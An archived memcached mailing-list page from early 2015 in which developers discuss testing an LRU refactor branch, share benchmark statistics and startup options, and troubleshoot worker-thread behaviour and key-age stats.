Re: Memcached odd behaviour on intel xeon E5-4610

2015-02-09 Thread dormando
 I am running some tests using memcached 1.4.22 on an Intel Xeon E5 (4 
 sockets with 8 cores each, 2 hyper-threads per core, and 4 NUMA nodes), 
 running Ubuntu trusty. I compiled memcached with gcc-4.8.2 with the default 
 CFLAGS and configuration options.

 The problem is that whenever I start memcached with an odd number of server 
 threads (3,5,7,9,11,..) everything is OK: all threads engage in processing 
 requests, and the status of every thread is Running. However, if I start the 
 server with an even number of threads (2,4,6,8,..), half of the threads are 
 always in sleep mode and never engage in servicing clients. This is specific 
 to memcached; memaslap, for example, runs with no such pattern. I ran the 
 exact same test on an AMD Opteron and things are OK with memcached. So my 
 question is: is there any specific tuning required for Intel machines? Is 
 there a specific flag, or some part of the code, that might cause worker 
 threads to not engage?


 Thanks,
 Saman

That is pretty weird. I've not run it on a quad-socket box, but I have on
plenty of Intel machines without problems. Modern ones too.

How many clients are you telling memslap to use? Can you try
https://github.com/dormando/mc-crusher quickly? (Run loadconf or a similar
config to load some values, then a different one to hammer it.)

Connections are dispersed via thread.c:dispatch_conn_new():

    int tid = (last_thread + 1) % settings.num_threads;
    LIBEVENT_THREAD *thread = threads + tid;
    last_thread = tid;

which is pretty simple at the base.
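
To illustrate (a standalone sketch, not memcached source): with that
round-robin, every worker receives connections once the client opens at
least num_threads of them, so a permanently sleeping thread would mean it
was simply never handed a connection:

    /* demo of the same round-robin dispatch; prints which worker
     * each new connection would land on */
    #include <stdio.h>

    int main(void) {
        int num_threads = 4;   /* try 3 vs 4: both distribute evenly */
        int last_thread = 0;
        for (int conn = 0; conn < 8; conn++) {
            int tid = (last_thread + 1) % num_threads;
            last_thread = tid;
            printf("conn %d -> thread %d\n", conn, tid);
        }
        return 0;
    }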

If you can attach gdb, can you dump the per-thread stats structures? That
will show definitively whether those threads ever get work or not.
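
Something along these lines (a session sketch; the exact symbol names are
assumptions from thread.c and need a build with debug symbols):

    $ gdb -p `pidof memcached`
    (gdb) print settings.num_threads
    (gdb) print threads[0].stats.get_cmds
    (gdb) print threads[1].stats.get_cmds
    (gdb) detach

A worker that never receives work should have all of its counters stuck at
zero.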

Re: memory efficiency / LRU refactor branch

2015-01-20 Thread dormando
Can probably get rid of that since I added the juggles stat, and/or
rename it to maintainer_runs or something... it was useful to see if I'd hung
the thread.

On Tue, 20 Jan 2015, Eric McConville wrote:

 This is more of a comment, but I noticed that when debugging with the 
 lru_maintainer option under extreme verbosity (-vvv), I get an endless 
 stream of running/sleeping messages.

     ~ ./memcached -vvv -o lru_maintainer
     // ... slab start-up ...
     LRU maintainer thread running
     LRU maintainer thread sleeping
     LRU maintainer thread running
     LRU maintainer thread sleeping
     LRU maintainer thread running
     LRU maintainer thread sleeping
     // ... endless...

 Expected, but a bit annoying

 On Tue, Jan 20, 2015 at 12:37 AM, dormando dorma...@rydia.net wrote:
   Thanks!

   No crashes is interesting/useful at least? No errors or other problems?

   I'm still hoping someone can side-by-side in production with the
   recommended settings. I can come up with synthetic tests all day and it
   doesn't educate in the same way.

   On Tue, 20 Jan 2015, Zhiwei Chan wrote:

Test result:
  I ran this test last night; the results are as follows:
1. environment:
[root@jason3 code]# lsb_release -a
LSB Version:    :base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarch
Distributor ID: CentOS
Description: CentOS release 6.5 (Final)
Release: 6.5
Codename: Final
[root@jason3 code]# free
             total       used       free     shared    buffers     cached
Mem:       8003888    3434536    4569352          0     263324    1372600
-/+ buffers/cache:    1798612    6205276
Swap:      8142840      11596    8131244
[root@jason3 code]# cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 58
model name : Intel(R) Xeon(R) CPU E3-1225 V2 @ 3.20GHz
stepping : 9
cpu MHz : 1600.000
cache size : 8192 KB
(4 cores)
   
2. running options:
[root@jason3 code]# ps -ef|grep memcached-
root      7898     1 11 Jan19 ?        02:12:46 ./memcached-master -c 10240 -o tail_repair_time=7200 -m 64 -u root -p 3 -d
root      8092     1 11 Jan19 ?        02:11:22 ./memcached-lrurework -d -c 10240 -o lru_maintainer lru_crawler -m 64 -u root -p 4
root     10265  9447  0 11:30 pts/1    00:00:00 grep memcached-
root     10325     1 11 Jan19 ?        02:06:14 ./memcached-release -d -c 10240 -m 64 -u root -p 5 -o slab_reassign lru_crawler slab_automove=3 release_mem_sleep=1 release_mem_start=40 release_mem_stop=80 lru_crawler_interval=3600
  
memcached-master : the latest memcached from the master branch, on port 3
memcached-lrurework: the latest lrurework branch of dormando's memcached, on port 4
memcached-release: the latest master branch + the release-memory patch, on port 5
   
3. What is the traffic mode?
  It simulates the traffic distribution of one of our pools, with the 
 expire-time and value-length distributions as follows:
#the expire of keys
expire_time         = [1,5,10,30,60,300,600,3600,86400,0]
expire_time_weight  = [1,1, 2, 5, 8,  5,  6,   5,    3,1]
   
#the len of value
value_len         = [4,10,50,100,200,500,1000,2000,5000,1]
value_len_weight  = [3, 4, 5,  8,  8, 10,   5,   5,   2,    1]
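
compare_test.py itself isn't shown here; presumably it draws each request's
expire time and value length by a weighted random pick over those tables,
along the lines of this illustrative C sketch (an assumption, not the
actual script):

    /* pick values[i] with probability weights[i] / sum(weights) */
    #include <stdlib.h>

    int weighted_pick(const int *values, const int *weights, int n) {
        int total = 0;
        for (int i = 0; i < n; i++) total += weights[i];
        int r = rand() % total;           /* uniform in [0, total) */
        for (int i = 0; i < n; i++) {
            if (r < weights[i]) return values[i];
            r -= weights[i];
        }
        return values[n - 1];             /* not reached */
    }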
   
Using the python script compare_test.py to execute: python ./compare_test.py 
   192.168.116.213:3,192.168.116.213:4,192.168.116.213:5
   
I run the test process on the same machine that runs the memcached 
 processes, so that it is easy to generate a heavy workload.
   
I got the test results of the last 12 hours, watched in Cacti. It seems 
 that there is no difference between them for this traffic mode.
gets/sets = 9:1
hit_rate ~ 50%
  [IMAGE]
  I also print some detailed statistics in the test script:
 
  Cache list: ['192.168.116.213:3', '192.168.116.213:4', '192.168.116.213:5']
  send_key_number: 127306   --- number of unique keys
  test_loop: 0   --- loop forever, no limit
  weight of get/set commands: [10, 1]   --- the weights of the get/set 
  commands. Note: if a get misses, the key is set immediately, and that set 
  is not counted in this weight.
  show_interval: 10    --- the interval for showing statistics info.
  stats_interval: 5      --- the interval for fetching memcached's stats.
  show_stats_interval: [60, 3600, 43200]   --- the time ranges shown, in 
  seconds; e.g. 60 means the last 60s, and 3600 the last 3600s.
  len of keys: [4, 10, 50, 100, 200, 500, 1000, 2000, 5000, 1]   --- possible

Re: memory efficiency / LRU refactor branch

2015-01-19 Thread dormando
: 12405356058, OOMs: 0, evict: 359460
   192.168.116.213:5
 [60s] gets: 523093, hit: 49%, updates: 52116, dels: 0, items: 28/69396, read: 52993446, write: 215231210, OOMs: 0, evict: 6491
 [3600s] gets: 29669464, hit: 49%, updates: 2961988, dels: 0, items: -25/69396, read: 3038356827, write: 12219764097, OOMs: 0, evict: 355644
 ...



 On Fri, Jan 16, 2015 at 9:29 PM, Zhiwei Chan z.w.chan.ja...@gmail.com wrote:
     Our maintenance team tends to be conservative, especially about basic 
 software where performance matters, so I think it is unlikely we can push 
 it to production soon. But I wrote a pretty convenient tool in Python for 
 an A/B test. The tool can fake traffic with random expire times and random 
 value lengths, can specify the weights of the different expire times and 
 lengths, and has lots of other functions. It is almost complete, and I can 
 post a result next Monday.

 On Fri, Jan 16, 2015 at 11:12 AM, dormando dorma...@rydia.net wrote:
   If you want?

   What would make you confident enough to try the branch in production? Or
   do you rely on your other patches and that's not really possible?

   On Thu, 15 Jan 2015, Zhiwei Chan wrote:

  I tried to use the application's real traffic to make a comparison test, 
 but it seems that not everyone uses a cache client with consistent hashing 
 in the dev environment. The result is that the traffic is not distributed 
 as well as I expected.
  Should I fake the traffic for the comparison test instead of using real 
 traffic? E.g., fake traffic with random expire-time keys to set and get 
 against memcached.
   
---
host mc56 installs the latest LRU-rework branch's memcached, with options 
 like: /usr/local/bin/memcached -u nobody -d -c 10240 -o lru_maintainer lru_crawler -m 64 -p 11811;
host mc57 installs version 1.4.20_7_gb118a6c's memcached, with options 
 like: /usr/bin/memcached -u nobody -d -c 10240 -o tail_repair_time=7200 -m 64 -p 11811.
   
I sum up the stats of all memcached instances on each host and make the 
 following analysis:
   
Inline image 1
   
On Wed, Jan 14, 2015 at 1:58 AM, dormando dorma...@rydia.net wrote:
          Last update to the branch was 3 days ago. I'm not planning on 
 doing any
          more work on it at the moment, so people have a chance to test 
 it.
   
          thanks!
   
          On Tue, 13 Jan 2015, Zhiwei Chan wrote:
   
            I compiled directly from your branch on the test server; please 
 tell me if it needs updating and re-compiling.
          
           On Tue, Jan 13, 2015 at 4:20 AM, dormando 
 dorma...@rydia.net wrote:
                 That sounds like an okay place to start. Can you please 
 make sure the
                 other dev server is running the very latest version of 
 the branch? A lot
                 changed since last friday... a few pretty bad bugs.
          
                 Please use the startup options described in the middle 
 of the PR.
          
                 If anyone's brave enough to try the latest branch on 
 one production
                 instance (if they have a low traffic one somewhere, 
 maybe?) that'd be
                 good. I ran the branch under a load tester for a few 
 hours, it passes
                 tests, etc. If I merge it, it'll just go into people's 
 productions without
                 ever having a production test first, so hopefully 
 someone can try it?
          
                 thanks
          
                 On Mon, 12 Jan 2015, Zhiwei Chan wrote:
          
                     I have run it since last Friday, so far no crash. As I 
 have finished the haproxy work today, I will try a comparison test for 
 this LRU work tomorrow, as follows: There are two servers (CentOS 5.8, 8 
 cores, 8G memory) in the dev environment; both servers run 32 memcached 
 instances (processes) with a maximum memory of 128M. One server runs 
 version 1.4.21, the other runs this branch. There are lots of pools using 
 these memcached servers, and all pools use two memcached instances on 
 different servers. The pools' clients use a consistent hash algorithm to 
 distribute keys to their 2 memcached instances. I will watch the hit rate 
 and other performance using Cacti.
                     I think it will work, but usually there is not much 
 traffic in our dev environment. Please tell me if you have any other advice.
                    
                 
                  2015-01-08 4:21 GMT+08

Re: memory efficiency / LRU refactor branch

2015-01-15 Thread dormando
If you want?

What would make you confident enough to try the branch in production? Or
do you rely on your other patches and that's not really possible?

On Thu, 15 Jan 2015, Zhiwei Chan wrote:

   I tried to use the application's real traffic to make a comparison test, 
 but it seems that not everyone uses a cache client with consistent hashing 
 in the dev environment. The result is that the traffic is not distributed 
 as well as I expected.
   Should I fake the traffic for the comparison test instead of using real 
 traffic? E.g., fake traffic with random expire-time keys to set and get 
 against memcached.

 ---
 host mc56 installs the latest LRU-rework branch's memcached, with options 
 like: /usr/local/bin/memcached -u nobody -d -c 10240 -o lru_maintainer lru_crawler -m 64 -p 11811;
 host mc57 installs version 1.4.20_7_gb118a6c's memcached, with options 
 like: /usr/bin/memcached -u nobody -d -c 10240 -o tail_repair_time=7200 -m 64 -p 11811.

 I sum up the stats of all memcached instances on each host and make the 
 following analysis:

 Inline image 1

 On Wed, Jan 14, 2015 at 1:58 AM, dormando dorma...@rydia.net wrote:
   Last update to the branch was 3 days ago. I'm not planning on doing any
   more work on it at the moment, so people have a chance to test it.

   thanks!

   On Tue, 13 Jan 2015, Zhiwei Chan wrote:

I compiled directly from your branch on the test server; please tell me if 
 it needs updating and re-compiling.
   
On Tue, Jan 13, 2015 at 4:20 AM, dormando dorma...@rydia.net wrote:
          That sounds like an okay place to start. Can you please make 
 sure the
          other dev server is running the very latest version of the 
 branch? A lot
          changed since last friday... a few pretty bad bugs.
   
          Please use the startup options described in the middle of the 
 PR.
   
          If anyone's brave enough to try the latest branch on one 
 production
          instance (if they have a low traffic one somewhere, maybe?) 
 that'd be
          good. I ran the branch under a load tester for a few hours, it 
 passes
          tests, etc. If I merge it, it'll just go into people's 
 productions without
          ever having a production test first, so hopefully someone can 
 try it?
   
          thanks
   
          On Mon, 12 Jan 2015, Zhiwei Chan wrote:
   
              I have run it since last Friday, so far no crash. As I have 
 finished the haproxy work today, I will try a comparison test for this LRU 
 work tomorrow, as follows: There are two servers (CentOS 5.8, 8 cores, 8G 
 memory) in the dev environment; both servers run 32 memcached instances 
 (processes) with a maximum memory of 128M. One server runs version 1.4.21, 
 the other runs this branch. There are lots of pools using these memcached 
 servers, and all pools use two memcached instances on different servers. 
 The pools' clients use a consistent hash algorithm to distribute keys to 
 their 2 memcached instances. I will watch the hit rate and other 
 performance using Cacti.
              I think it will work, but usually there is not much traffic 
 in our dev environment. Please tell me if you have any other advice.
             
          
           2015-01-08 4:21 GMT+08:00 dormando dorma...@rydia.net:
                 Hey,
          
                 To all three of you: Just run it anywhere you can (but 
 not more than one
                 machine, yet?), with the options prescribed in the PR. 
 Ideally you have
                 graphs of the hit ratio and maybe cache fullness and 
 can compare
                 before/after.
          
                 And let me know if it hangs or crashes, obviously. If 
 so a backtrace
                 and/or coredump would be fantastic.
          
                 On Thu, 8 Jan 2015, Zhiwei Chan wrote:
          
                     I will deploy it to one of our test environments on 
 CentOS 5.8, for a comparison test against 1.4.21, although the workload is 
 not as heavy as in the production environment. Tell me if there is 
 anything I can help with.
                 
                  2015-01-07 23:30 GMT+08:00 Eric McConville 
 erichasem...@gmail.com:
                         Same here. Do you want any findings posted to 
 the mailing list, or the PR thread?
                 
                  On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh 
 m...@ryanmccullagh.com wrote:
                        I'm willing to help out in any way possible. 
 What can I do?
                 
                        -Original Message-
                        From: memcached@googlegroups.com 
 [mailto:memcached

Re: memory efficiency / LRU refactor branch

2015-01-13 Thread dormando
Last update to the branch was 3 days ago. I'm not planning on doing any
more work on it at the moment, so people have a chance to test it.

thanks!

On Tue, 13 Jan 2015, Zhiwei Chan wrote:

 I compiled directly from your branch on the test server; please tell me 
 if it needs updating and re-compiling.

 On Tue, Jan 13, 2015 at 4:20 AM, dormando dorma...@rydia.net wrote:
   That sounds like an okay place to start. Can you please make sure the
   other dev server is running the very latest version of the branch? A lot
   changed since last friday... a few pretty bad bugs.

   Please use the startup options described in the middle of the PR.

   If anyone's brave enough to try the latest branch on one production
   instance (if they have a low traffic one somewhere, maybe?) that'd be
   good. I ran the branch under a load tester for a few hours, it passes
   tests, etc. If I merge it, it'll just go into people's productions 
 without
   ever having a production test first, so hopefully someone can try it?

   thanks

   On Mon, 12 Jan 2015, Zhiwei Chan wrote:

   I have run it since last Friday, so far no crash. As I have finished the 
 haproxy work today, I will try a comparison test for this LRU work 
 tomorrow, as follows: There are two servers (CentOS 5.8, 8 cores, 8G 
 memory) in the dev environment; both servers run 32 memcached instances 
 (processes) with a maximum memory of 128M. One server runs version 1.4.21, 
 the other runs this branch. There are lots of pools using these memcached 
 servers, and all pools use two memcached instances on different servers. 
 The pools' clients use a consistent hash algorithm to distribute keys to 
 their 2 memcached instances. I will watch the hit rate and other 
 performance using Cacti.
   I think it will work, but usually there is not much traffic in our dev 
 environment. Please tell me if you have any other advice.
  
   
2015-01-08 4:21 GMT+08:00 dormando dorma...@rydia.net:
          Hey,
   
          To all three of you: Just run it anywhere you can (but not more 
 than one
          machine, yet?), with the options prescribed in the PR. Ideally 
 you have
          graphs of the hit ratio and maybe cache fullness and can compare
          before/after.
   
          And let me know if it hangs or crashes, obviously. If so a 
 backtrace
          and/or coredump would be fantastic.
   
          On Thu, 8 Jan 2015, Zhiwei Chan wrote:
   
              I will deploy it to one of our test environments on CentOS 
 5.8, for a comparison test against 1.4.21, although the workload is not as 
 heavy as in the production environment. Tell me if there is anything I can 
 help with.
          
           2015-01-07 23:30 GMT+08:00 Eric McConville 
 erichasem...@gmail.com:
                  Same here. Do you want any findings posted to the 
 mailing list, or the PR thread?
          
           On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh 
 m...@ryanmccullagh.com wrote:
                 I'm willing to help out in any way possible. What can I 
 do?
          
                 -Original Message-
                 From: memcached@googlegroups.com 
 [mailto:memcached@googlegroups.com] On
                 Behalf Of dormando
                 Sent: Wednesday, January 7, 2015 3:52 AM
                 To: memcached@googlegroups.com
                 Subject: memory efficiency / LRU refactor branch
          
                 Yo,
          
                 https://github.com/memcached/memcached/pull/97
          
                  Opening to a wider audience. I need some folks willing 
 to poke at it and see if their workloads fare better or worse with 
 respect to hit ratios.
          
                 The rest of the work remaining on my end is more 
 testing, and some TODO's
                 noted in the PR. The remaining work is relatively small 
 aside from the page
                 mover idea. It hasn't been crashing or hanging in my 
 testing so far, but
                 that might still happen.
          
                 I can't/won't merge this until I get some evidence that 
 it's useful.
                 Hoping someone out there can lend a hand. I don't know 
 what the actual
                 impact would be, but for some workloads it could be 
 large. Even for folks
                 who have set all items to never expire, it could still 
 potentially improve
                 hit ratios by better protecting active items.
          
                 It will work best if you at least have a mix of items 
 with TTL's that expire
                 in reasonable amounts of time.
          
                 thanks

Re: Is there a way to work out when the key was written to memcache and calculate the age of the oldest key on our memcache?

2015-01-12 Thread dormando
The only data stored are when the item expires and when it was last
accessed.

The age field (and evicted_time) is how long ago the oldest item in the
LRU was accessed. You can roughly tell how wide your LRU is with that.
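
For example, per slab class (a made-up session; age is in seconds):

    $ echo 'stats items' | nc 127.0.0.1 11211
    STAT items:1:number 5046673
    STAT items:1:age 86112
    ...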

On Mon, 12 Jan 2015, 'Jay Grizzard' via memcached wrote:

 I don’t think there’s a way to figure out when a given key was written. If 
 you really needed that, you could write it as part of the data you
 stored, or use the ‘flags’ field to store a unixtime timestamp.
 You can get the age of the oldest key, on a per-slab basis, with ‘stats 
 items’ and looking at the ‘age’ field. If you want the overall oldest age,
 you’ll have to find the oldest age value amongst all the slabs.
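 One way to pull the overall maximum out of that (an untested one-liner 
 sketch):

     echo 'stats items' | nc 127.0.0.1 11211 | awk -F: '/:age / { split($3, a, " "); if (a[2] > m) m = a[2] } END { print m }'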

 Do note, though, that if you have evictions going on, ‘oldest’ is kind of 
 dubious if you’re trying to use it as an “anything newer than this exists” 
 marker, since evictions happen in LRU order and per-slab, so younger items 
 can disappear before older ones if they’re in a different slab or have 
 been accessed more recently. (Don’t know if that’s what you’re doing, but 
 just in case you are…)

 -j


 On Mon, Jan 12, 2015 at 9:34 AM, Gurdipe Dosanjh gurd...@veeqo.com wrote:
   Hi All,

 I am new to memcache and need to know: is there a way to work out when a 
 key was written to memcache, and to calculate the age of the oldest key on 
 our memcache?

 Kind Regards

 Gurdipe




Re: memory efficiency / LRU refactor branch

2015-01-12 Thread dormando
That sounds like an okay place to start. Can you please make sure the
other dev server is running the very latest version of the branch? A lot
changed since last friday... a few pretty bad bugs.

Please use the startup options described in the middle of the PR.

If anyone's brave enough to try the latest branch on one production
instance (if they have a low traffic one somewhere, maybe?) that'd be
good. I ran the branch under a load tester for a few hours, it passes
tests, etc. If I merge it, it'll just go into people's productions without
ever having a production test first, so hopefully someone can try it?

thanks

On Mon, 12 Jan 2015, Zhiwei Chan wrote:

   I have run it since last Friday, so far no crash. As I have finished the 
 haproxy work today, I will try a comparison test for this LRU work 
 tomorrow, as follows: There are two servers (CentOS 5.8, 8 cores, 8G 
 memory) in the dev environment; both servers run 32 memcached instances 
 (processes) with a maximum memory of 128M. One server runs version 1.4.21, 
 the other runs this branch. There are lots of pools using these memcached 
 servers, and all pools use two memcached instances on different servers. 
 The pools' clients use a consistent hash algorithm to distribute keys to 
 their 2 memcached instances. I will watch the hit rate and other 
 performance using Cacti.
   I think it will work, but usually there is not much traffic in our dev 
 environment. Please tell me if you have any other advice.
   

 2015-01-08 4:21 GMT+08:00 dormando dorma...@rydia.net:
   Hey,

   To all three of you: Just run it anywhere you can (but not more than one
   machine, yet?), with the options prescribed in the PR. Ideally you have
   graphs of the hit ratio and maybe cache fullness and can compare
   before/after.

   And let me know if it hangs or crashes, obviously. If so a backtrace
   and/or coredump would be fantastic.

   On Thu, 8 Jan 2015, Zhiwei Chan wrote:

  I will deploy it to one of our test environments on CentOS 5.8, for a 
 comparison test against 1.4.21, although the workload is not as heavy as in 
 the production environment. Tell me if there is anything I can help with.
   
2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com:
          Same here. Do you want any findings posted to the mailing list, 
 or the PR thread?
   
On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh 
 m...@ryanmccullagh.com wrote:
          I'm willing to help out in any way possible. What can I do?
   
          -Original Message-
          From: memcached@googlegroups.com 
 [mailto:memcached@googlegroups.com] On
          Behalf Of dormando
          Sent: Wednesday, January 7, 2015 3:52 AM
          To: memcached@googlegroups.com
          Subject: memory efficiency / LRU refactor branch
   
          Yo,
   
          https://github.com/memcached/memcached/pull/97
   
          Opening to a wider audience. I need some folks willing to poke 
 at it and see if their workloads fare better or worse with respect to hit 
 ratios.
   
          The rest of the work remaining on my end is more testing, and 
 some TODO's
          noted in the PR. The remaining work is relatively small aside 
 from the page
          mover idea. It hasn't been crashing or hanging in my testing so 
 far, but
          that might still happen.
   
          I can't/won't merge this until I get some evidence that it's 
 useful.
          Hoping someone out there can lend a hand. I don't know what the 
 actual
          impact would be, but for some workloads it could be large. Even 
 for folks
          who have set all items to never expire, it could still 
 potentially improve
          hit ratios by better protecting active items.
   
          It will work best if you at least have a mix of items with 
 TTL's that expire
          in reasonable amounts of time.
   
          thanks,
          -Dormando
   

Re: memory efficiency / LRU refactor branch

2015-01-08 Thread dormando
Hi,

https://github.com/memcached/memcached/pull/97

I've been poking at the TODO list since originally posting and fixed a
number of bugs. I'm taking some extra time to think about the slab
rebalancer situation and will be doing more testing than coding from now
on.

Hoping to get some of you folks involved in testing. I'll give it a good
soak before merging. Please and thanks!

On Wed, 7 Jan 2015, dormando wrote:

 Hey,

 To all three of you: Just run it anywhere you can (but not more than one
 machine, yet?), with the options prescribed in the PR. Ideally you have
 graphs of the hit ratio and maybe cache fullness and can compare
 before/after.

 And let me know if it hangs or crashes, obviously. If so a backtrace
 and/or coredump would be fantastic.

 On Thu, 8 Jan 2015, Zhiwei Chan wrote:

   I will deploy it to one of our test environments on CentOS 5.8, for a 
  comparison test against 1.4.21, although the workload is not as heavy as 
  in the production environment. Tell me if there is anything I can help with.
 
  2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com:
Same here. Do you want any findings posted to the mailing list, or 
  the PR thread?
 
  On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com 
  wrote:
I'm willing to help out in any way possible. What can I do?
 
-Original Message-
From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] 
  On
Behalf Of dormando
Sent: Wednesday, January 7, 2015 3:52 AM
To: memcached@googlegroups.com
Subject: memory efficiency / LRU refactor branch
 
Yo,
 
https://github.com/memcached/memcached/pull/97
 
Opening to a wider audience. I need some folks willing to poke at it 
  and see if their workloads fare better or worse with respect to hit ratios.
 
The rest of the work remaining on my end is more testing, and some 
  TODO's
noted in the PR. The remaining work is relatively small aside from 
  the page
mover idea. It hasn't been crashing or hanging in my testing so far, 
  but
that might still happen.
 
I can't/won't merge this until I get some evidence that it's useful.
Hoping someone out there can lend a hand. I don't know what the actual
impact would be, but for some workloads it could be large. Even for 
  folks
who have set all items to never expire, it could still potentially 
  improve
hit ratios by better protecting active items.
 
It will work best if you at least have a mix of items with TTL's that 
  expire
in reasonable amounts of time.
 
thanks,
-Dormando
 
 
 

RE: memory efficiency / LRU refactor branch

2015-01-08 Thread dormando
The latest commits document the new statistics counters. If there are others
that might be interesting, let me know.

Mainly to compare before/after you only really need to look at the hit
ratio. If your dataset is large enough to push items through cache, this
is where the improvements start.

Otherwise, uh... if it actually functions, that's good to know and generally
obvious to monitor (non-corrupt data, doesn't crash).
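
For instance, a rough one-liner for the global hit ratio (an untested
sketch; assumes the stock stats output):

    echo stats | nc 127.0.0.1 11211 | awk '$2 == "get_hits" { h = $3 } $2 == "get_misses" { m = $3 } END { print h / (h + m) }'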

On Thu, 8 Jan 2015, Ryan McCullagh wrote:

 Hi,

 I'm going to be using your lru_rework branch on my development machines 
 starting tonight.

 I'm looking for some ways to monitor it - any suggestions?

 -Original Message-
 From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On 
 Behalf Of dormando
 Sent: Thursday, January 8, 2015 9:25 PM
 To: memcached@googlegroups.com
 Subject: Re: memory efficiency / LRU refactor branch

 Hi,

 https://github.com/memcached/memcached/pull/97

 I've been poking at the TODO list since originally posting and fixed a number 
 of bugs. I'm taking some extra time to think about the slab rebalancer 
 situation and will be doing more testing than coding from now on.

 Hoping to get some of you folks involved in testing. I'll give it a good soak 
 before merging. Please and thanks!

 On Wed, 7 Jan 2015, dormando wrote:

  Hey,
 
  To all three of you: Just run it anywhere you can (but not more than
  one machine, yet?), with the options prescribed in the PR. Ideally you
  have graphs of the hit ratio and maybe cache fullness and can compare
  before/after.
 
  And let me know if it hangs or crashes, obviously. If so a backtrace
  and/or coredump would be fantastic.
 
  On Thu, 8 Jan 2015, Zhiwei Chan wrote:
 
 I will deploy it to one of our test environments on CentOS 5.8, for
   a comparison test against 1.4.21, although the workload is not as 
   heavy as in the production environment. Tell me if there is anything 
   I can help with.
  
   2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com:
 Same here. Do you want any findings posted to the mailing list, or 
   the PR thread?
  
   On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com 
   wrote:
 I'm willing to help out in any way possible. What can I do?
  
 -Original Message-
 From: memcached@googlegroups.com 
   [mailto:memcached@googlegroups.com] On
 Behalf Of dormando
 Sent: Wednesday, January 7, 2015 3:52 AM
 To: memcached@googlegroups.com
 Subject: memory efficiency / LRU refactor branch
  
 Yo,
  
 https://github.com/memcached/memcached/pull/97
  
 Opening to a wider audience. I need some folks willing to poke at 
   it and see if their workloads fare better or worse with respect to 
   hit ratios.
  
 The rest of the work remaining on my end is more testing, and some 
   TODO's
 noted in the PR. The remaining work is relatively small aside from 
   the page
 mover idea. It hasn't been crashing or hanging in my testing so 
   far, but
 that might still happen.
  
 I can't/won't merge this until I get some evidence that it's useful.
 Hoping someone out there can lend a hand. I don't know what the 
   actual
 impact would be, but for some workloads it could be large. Even for 
   folks
 who have set all items to never expire, it could still potentially 
   improve
 hit ratios by better protecting active items.
  
 It will work best if you at least have a mix of items with TTL's 
   that expire
 in reasonable amounts of time.
  
 thanks,
 -Dormando
  



memory efficiency / LRU refactor branch

2015-01-07 Thread dormando
Yo,

https://github.com/memcached/memcached/pull/97

Opening to a wider audience. I need some folks willing to poke at it and
see if their workloads fare better or worse with respect to hit ratios.

The rest of the work remaining on my end is more testing, and some TODO's
noted in the PR. The remaining work is relatively small aside from the
page mover idea. It hasn't been crashing or hanging in my testing so far,
but that might still happen.

I can't/won't merge this until I get some evidence that it's useful.
Hoping someone out there can lend a hand. I don't know what the actual
impact would be, but for some workloads it could be large. Even for folks
who have set all items to never expire, it could still potentially improve
hit ratios by better protecting active items.

It will work best if you at least have a mix of items with TTL's that
expire in reasonable amounts of time.

thanks,
-Dormando


Re: memory efficiency / LRU refactor branch

2015-01-07 Thread dormando
To be extra clear: you can send feedback here or on the PR. I don't care
either way.

On Wed, 7 Jan 2015, dormando wrote:

 Hey,

 To all three of you: Just run it anywhere you can (but not more than one
 machine, yet?), with the options prescribed in the PR. Ideally you have
 graphs of the hit ratio and maybe cache fullness and can compare
 before/after.

 And let me know if it hangs or crashes, obviously. If so a backtrace
 and/or coredump would be fantastic.

 On Thu, 8 Jan 2015, Zhiwei Chan wrote:

   I will deploy it to one of our test environments on CentOS 5.8, for a 
  comparison test against 1.4.21, although the workload is not as heavy as 
  in the production environment. Tell me if there is anything I can help with.
 
  2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com:
Same here. Do you want any findings posted to the mailing list, or 
  the PR thread?
 
  On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com 
  wrote:
I'm willing to help out in any way possible. What can I do?
 
-Original Message-
From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] 
  On
Behalf Of dormando
Sent: Wednesday, January 7, 2015 3:52 AM
To: memcached@googlegroups.com
Subject: memory efficiency / LRU refactor branch
 
Yo,
 
https://github.com/memcached/memcached/pull/97
 
Opening to a wider audience. I need some folks willing to poke at it 
  and see if their workloads fare better or worse with respect to hit ratios.
 
The rest of the work remaining on my end is more testing, and some 
  TODO's
noted in the PR. The remaining work is relatively small aside from 
  the page
mover idea. It hasn't been crashing or hanging in my testing so far, 
  but
that might still happen.
 
I can't/won't merge this until I get some evidence that it's useful.
Hoping someone out there can lend a hand. I don't know what the actual
impact would be, but for some workloads it could be large. Even for 
  folks
who have set all items to never expire, it could still potentially 
  improve
hit ratios by better protecting active items.
 
It will work best if you at least have a mix of items with TTL's that 
  expire
in reasonable amounts of time.
 
thanks,
-Dormando
 
 
 

Re: memory efficiency / LRU refactor branch

2015-01-07 Thread dormando
Hey,

To all three of you: Just run it anywhere you can (but not more than one
machine, yet?), with the options prescribed in the PR. Ideally you have
graphs of the hit ratio and maybe cache fullness and can compare
before/after.

And let me know if it hangs or crashes, obviously. If so a backtrace
and/or coredump would be fantastic.

On Thu, 8 Jan 2015, Zhiwei Chan wrote:

   I will deploy it to one of our test environments on CentOS 5.8, for a 
  comparison test against 1.4.21, although the workload is not as heavy as 
  in the production environment. Tell me if there is anything I can help with.

 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com:
   Same here. Do you want any findings posted to the mailing list, or the 
 PR thread?

 On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote:
   I'm willing to help out in any way possible. What can I do?

   -Original Message-
   From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On
   Behalf Of dormando
   Sent: Wednesday, January 7, 2015 3:52 AM
   To: memcached@googlegroups.com
   Subject: memory efficiency / LRU refactor branch

   Yo,

